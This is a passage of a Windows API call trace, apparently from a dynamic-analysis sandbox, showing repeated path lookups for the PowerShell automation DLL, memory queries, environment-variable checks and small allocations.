	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetLastError () returned 0xcb
	[0228.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.948] GetLastError () returned 0xcb
	[0228.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.948] GetLastError () returned 0xcb
	[0228.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.948] GetLastError () returned 0xcb
	[0228.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.948] GetLastError () returned 0xcb
	[0228.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.948] GetLastError () returned 0xcb
	[0228.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.948] GetLastError () returned 0xcb
	[0228.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.948] GetLastError () returned 0xcb
	[0228.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.948] GetLastError () returned 0xcb
	[0228.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.949] GetLastError () returned 0xcb
	[0228.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.949] GetLastError () returned 0xcb
	[0228.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.949] GetLastError () returned 0xcb
	[0228.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.949] GetLastError () returned 0xcb
	[0228.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.949] GetLastError () returned 0xcb
	[0228.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.949] GetLastError () returned 0xcb
	[0228.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.949] GetLastError () returned 0xcb
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetLastError () returned 0xcb
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetLastError () returned 0xcb
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetLastError () returned 0xcb
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetLastError () returned 0xcb
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetLastError () returned 0xcb
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetLastError () returned 0xcb
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetLastError () returned 0xcb
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetLastError () returned 0xcb
	[0228.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.951] GetLastError () returned 0xcb
	[0228.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.951] GetLastError () returned 0xcb
	[0228.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.951] GetLastError () returned 0xcb
	[0228.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.951] GetLastError () returned 0xcb
	[0228.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.951] GetLastError () returned 0xcb
	[0228.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.951] GetLastError () returned 0xcb
	[0228.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.951] GetLastError () returned 0xcb
	[0228.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.952] GetLastError () returned 0xcb
	[0228.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.953] GetLastError () returned 0xcb
	[0228.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.953] GetLastError () returned 0xcb
	[0228.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.953] GetLastError () returned 0xcb
	[0228.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.974] GetLastError () returned 0xcb
	[0228.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.974] GetLastError () returned 0xcb
	[0228.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.974] GetLastError () returned 0xcb
	[0228.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.974] GetLastError () returned 0xcb
	[0228.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.974] GetLastError () returned 0xcb
	[0228.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.975] GetLastError () returned 0xcb
	[0228.975] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0228.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.976] GetLastError () returned 0xcb
	[0228.982] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0229.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.104] GetLastError () returned 0xcb
	[0229.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.106] GetLastError () returned 0xcb
	[0229.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.110] GetLastError () returned 0xcb
	[0229.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.118] GetLastError () returned 0xcb
	[0229.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.127] GetLastError () returned 0xcb
	[0229.291] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0229.293] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0229.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.321] GetLastError () returned 0xcb
	[0229.483] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0229.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.493] GetLastError () returned 0xcb
	[0229.969] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x4fad00
	[0229.970] GetLastError () returned 0x0
	[0229.971] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x4fad88
	[0229.971] GetLastError () returned 0x0
	[0230.335] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.580] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.582] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.583] VirtualQuery (in: lpAddress=0x10c964, lpBuffer=0x10d964, dwLength=0x1c | out: lpBuffer=0x10d964*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.604] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.605] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0230.606] VirtualQuery (in: lpAddress=0x10d2b0, lpBuffer=0x10e2b0, dwLength=0x1c | out: lpBuffer=0x10e2b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
